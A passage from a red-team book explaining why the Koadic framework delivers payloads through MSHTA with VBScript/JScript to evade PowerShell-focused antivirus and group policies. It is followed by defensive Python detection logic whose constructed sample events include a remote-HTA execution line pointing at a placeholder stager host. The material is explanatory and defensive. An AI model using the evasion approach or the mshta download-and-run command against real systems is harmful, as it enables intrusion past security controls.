Hands-On Red Team Tactics

Why use MSHTA as the dropper payload?

One of the coolest reasons for using MSHTA for payload delivery is its support for scripting languages such as VBScript and JScript; as explained in the introductory part of this tool, Koadic does not use PowerShell for post-exploitation. PowerShell was a really great playground for attackers and red teamers for years, and like every good playground, there comes a time when it gets too messy. Nowadays, even if you encode the PowerShell command in base64 or with any other encoder, the payload delivery still gets detected by so-called antivirus products with machine learning and artificial intelligence. The reason for this is that instead of trying to detect the payload command or the shellcode embedded in it, these smart AVs detect the intrusion from the mere execution of the powershell.exe program.

In a corporate environment, there are times when servers have no third-party AV installed and the built-in AV solution (Windows Defender) is also disabled. Even then, if you try to execute powershell.exe, the execution is denied by the server because of strictly enforced group policies.

There is another issue with payload delivery over PowerShell, and that is PowerShell itself. The payload can only be delivered and executed if the installed PowerShell supports the functions used in the payload. For example, if the payload requires PowerShell version 2 but is executed on Microsoft Windows Server 2003, which supports only PowerShell version 1, the payload execution will fail. Koadic, on the other hand, relies on VBScript and JScript, which have shipped with Windows since its older versions and are still supported in the latest version, which makes the payload dropper more reliable than a PowerShell one.
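The text above makes the point that a detection keyed only on powershell.exe execution misses an MSHTA-based dropper. As an added defensive example (not code from the book or from Koadic), the following Python triage logic runs over constructed process-creation events and contrasts such a PowerShell-only rule with one that flags mshta.exe by its arguments and parent process; the event fields, sample paths, domains and parent-process list are assumptions for the example.

```python
import re
from typing import NamedTuple


class ProcEvent(NamedTuple):
    parent: str    # image name of the parent process
    image: str     # full path of the started image
    cmdline: str   # command line as logged


# Constructed process-creation events in Sysmon EventID 1 / Security 4688 style.
# Made up for this example; not real telemetry. The .invalid TLD is reserved.
SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", r"C:\Windows\System32\mshta.exe",
              r'mshta.exe "C:\Program Files\Vendor\Help\index.hta"'),
    ProcEvent("winword.exe", r"C:\Windows\System32\mshta.exe",
              "mshta.exe http://stager.example.invalid/run.hta"),
    ProcEvent("cmd.exe", r"C:\Windows\SysWOW64\mshta.exe",
              r"mshta.exe C:\Users\bob\AppData\Local\Temp\update.hta"),
    ProcEvent("cmd.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -EncodedCommand <base64 omitted>"),
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)
SCRIPT_URI_RE = re.compile(r"\b(javascript|vbscript|about):", re.IGNORECASE)
USER_WRITABLE_RE = re.compile(r"\\(Temp|AppData|Downloads|Public)\\", re.IGNORECASE)


def powershell_only_rule(ev: ProcEvent) -> bool:
    """The kind of rule the text describes: alert on any powershell.exe start."""
    return ev.image.lower().endswith("powershell.exe")


def mshta_rule(ev: ProcEvent) -> list:
    """Return the reasons an mshta.exe start looks like a dropper; [] if none."""
    if not ev.image.lower().endswith("mshta.exe"):
        return []
    reasons = []
    if URL_RE.search(ev.cmdline):
        reasons.append("remote URL argument")
    if SCRIPT_URI_RE.search(ev.cmdline):
        reasons.append("inline script protocol handler")
    if USER_WRITABLE_RE.search(ev.cmdline):
        reasons.append("HTA in user-writable path")
    if ev.parent.lower() in OFFICE_PARENTS:
        reasons.append(f"spawned by {ev.parent}")
    return reasons


def triage(events) -> dict:
    """Indices flagged by each rule, to compare their coverage side by side."""
    return {
        "powershell_only": [i for i, ev in enumerate(events) if powershell_only_rule(ev)],
        "mshta_rule": [i for i, ev in enumerate(events) if mshta_rule(ev)],
    }
```

On the sample set the PowerShell-only rule flags just the powershell.exe event, while the mshta rule flags the Office-spawned remote HTA and the HTA launched from a temp directory and leaves the vendor help file alone.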